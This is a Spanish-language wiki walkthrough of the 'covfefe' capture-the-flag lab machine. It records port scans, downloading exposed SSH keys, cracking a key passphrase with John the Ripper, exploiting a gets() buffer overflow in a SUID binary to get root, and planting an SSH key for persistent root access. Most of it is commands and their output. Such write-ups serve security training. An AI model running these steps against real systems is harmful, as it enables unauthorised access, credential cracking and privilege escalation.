covfefe - danielcastropalomares/security GitHub Wiki
Con un primer escaneo vemos los siguientes puertos abiertos:
root@kali:/tmp# nmap -p- 172.31.255.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 21:26 CET
Nmap scan report for 172.31.255.132
Host is up (0.000086s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
31337/tcp open Elite
MAC Address: 08:00:27:6D:77:80 (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -A 172.31.255.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-09 21:26 CET
Nmap scan report for 172.31.255.132
Host is up (0.00067s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
| 256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
|_ 256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (ED25519)
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-server-header: Werkzeug/0.11.15 Python/3.5.3
|_http-title: 404 Not Found
MAC Address: 08:00:27:6D:77:80 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.67 ms 172.31.255.132
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds
Enumeramos los posibles directorios:
root@kali:/usr/local/src/Osmedeus# ./osmedeus.py -m dir -t http://172.31.255.132:3133
Target: http://172.31.255.132:31337
[21:43:27] Starting:
[21:43:27] 200 - 3KB - /.bashrc
[21:43:28] 200 - 220B - /.bash_logout
[21:43:28] 200 - 19B - /.bash_history
[21:43:28] 200 - 3KB - /.bashrc/
[21:44:21] 200 - 675B - /.profile
[21:44:21] 200 - 395B - /.ssh/authorized_keys
[21:44:21] 200 - 2KB - /.ssh/id_rsa
[21:44:21] 200 - 395B - /.ssh/id_rsa.pub
[21:44:21] 200 - 43B - /.ssh
[21:44:35] 200 - 70B - /robots.txt
En el fichero robots.txt encontramos lo siguiente:
/robots.txt
User-agent: *
Disallow: /.bashrc
Disallow: /.profile
Disallow: /taxes
Encontramos la primera flag:
http://172.31.255.132:31337/taxes/
Good job! Here is a flag: flag1{make_america_great_again}
Si accedemos vía web:
http://172.31.255.132:31337/.ssh
['id_rsa', 'authorized_keys', 'id_rsa.pub']
Descargamos las llaves ssh:
root@kali:/tmp/covfefe# wget http://172.31.255.132:31337/.ssh/authorized_keys
root@kali:/tmp/covfefe# wget http://172.31.255.132:31337/.ssh/id_rsa
root@kali:/tmp/covfefe# wget http://172.31.255.132:31337/.ssh/id_rsa.pub
Vemos que la key dentro del authorized_keys es la misma pub del usuario simon:
root@kali:/usr/local/src/Osmedeus# cat /tmp/covfefe/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe
root@kali:/tmp/covfefe# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDzG6cWl499ZGW0PV+tRaOLguT8+lso8zbSLCzgiBYkX/xnoZx0fneSfi93gdh4ynVjs2sgZ2HaRWA05EGR7e3IetSP53NTxk5QrLHEGZQFLId3QMMi74ebGBpPkKg/QzwRxCrKgqL1b2+EYz68Y9InRAZoq8wYTLdoUVa2wOiJv0PfrlQ4e9nh29J7yPgXmVAsy5ZvmpBp5FL76y1lUblGUuftCfddh2IahevizLlVipuSQGFqRZOdA5xnxbsNO4QbFUhjIlA5RrAs814LuA9t2CiAzHXxjsVW8/R/eD8K22TO7XEQscQjaSl/R4Cr1kNtUwCljpmpjt/Q4DJmExOR simon@covfefe
Así que vamos a intentar a acceder con la llave, pero nos pide un password para desencriptarla:
root@kali:/tmp/covfefe# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
[email protected]: Permission denied (publickey).
root@kali:/tmp/covfefe# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,BD8515E8D3A10829A4D710D5AFAC64AB
Vamos a probar de desencriptarla con un ataque de diccionario, primero tenemos que convertir la key al formato de john ripper:
root@kali:/tmp/covfefe# ssh2john id_rsa > id_rsa.hash
root@kali:/tmp/covfefe# john -wordlist=/tmp/rockyou.txt id_rsa.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
starwars (id_rsa)
1g 0:00:00:00 DONE (2018-12-09 23:56) 50.00g/s 33450p/s 33450c/s 33450C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Ya tenemos el password "starwars". Ahora ya podemos conectarnos por SSH:
root@kali:/tmp/covfefe# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$
Podemos acceder al directorio root, pero no podemos listar el contenido del fichero flag.txt:
simon@covfefe:/root$ ls -liath
total 24K
187 drwxr-xr-x 2 root root 4.0K Jul 9 2017 .
513 -rw-r--r-- 1 root root 767 Jul 9 2017 read_message.c
41 -rw------- 1 root root 75 Jul 9 2017 flag.txt
2 drwxr-xr-x 21 root root 4.0K Jun 28 2017 ..
245 -rw-r--r-- 1 root root 148 Aug 18 2015 .profile
246 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
Encontramos otra flag en el fichero read_message.c:
simon@covfefe:/root$ head read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
Si buscamos archivos con permisos SUID, encontramos el binario "read_message":
simon@covfefe:/root$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message
/bin/umount
/bin/su
/bin/mount
/bin/ping
El código fuente del binario read_message lo podemos encontrar en la carpeta root:
simon@covfefe:~$ cat /root/read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// You're getting close! Here's another flag:
// flag2{use_the_source_luke}
int main(int argc, char *argv[]) {
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";
printf("What is your name?\n");
gets(buf);
// Only compare first five chars to save precious cycles:
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
} else {
printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
exit(EXIT_FAILURE);
}
}
Si nos fijamos en el código fuente, vemos que el input se hace mediante "gets", en el siguiente articulo explica la vulnerabilidad de overflow:
https://faq.cprogramming.com/cgi-bin/smartfaq.cgi?answer=1049157810&id=1043284351
Descargamos una shell para aprovechar el desbordamiento de buffer, la compilamos y la subimos a la maquina victima:
root@kali:~/covfefe# wget https://raw.githubusercontent.com/npapernot/buffer-overflow-attack/master/call_shellcode.c
root@kali:~/covfefe# gcc -m32 call_shellcode.c -o call_shellcode
root@kali:~/covfefe# scp -i id_rsa call_shellcode [email protected]:/tmp/
Enter passphrase for key 'id_rsa':
call_shellcode 100% 15KB 5.4MB/s 00:00
Teniendo en cuenta que el maximo de caracteres de la variable "buf" es 20, indicaremos el path de la shell después del caracter 20. Tenemos que indicar si o si "Simon", ya si no, no entrará dentro del if:
simon@covfefe:~$ /usr/local/bin/read_message
What is your name?
Simonyuioooooooooooo/tmp/call_shellcode
Hello Simonyuioooooooooooo/tmp/call_shellcode! Here is your message:
# id
uid=1000(simon) gid=1000(simon) euid=0(root) groups=1000(simon),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Ahora ya tenemos acceso root y podemos leer la bandera:
# cat /root/flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
# mkdir .ssh
# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVJZeFL8s25vndmwu3tahDcRXLuRm3DCpSER0x10bK3SIa53CZ319n2h/vKOBHvELdTvxyWf4VOQUUydkF7SJSHz................... root@kali' > .ssh/authorized_keys
Ya tendríamos remoto con el usuario root:
root@kali:~# ssh -i test2 [email protected]
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@covfefe:~#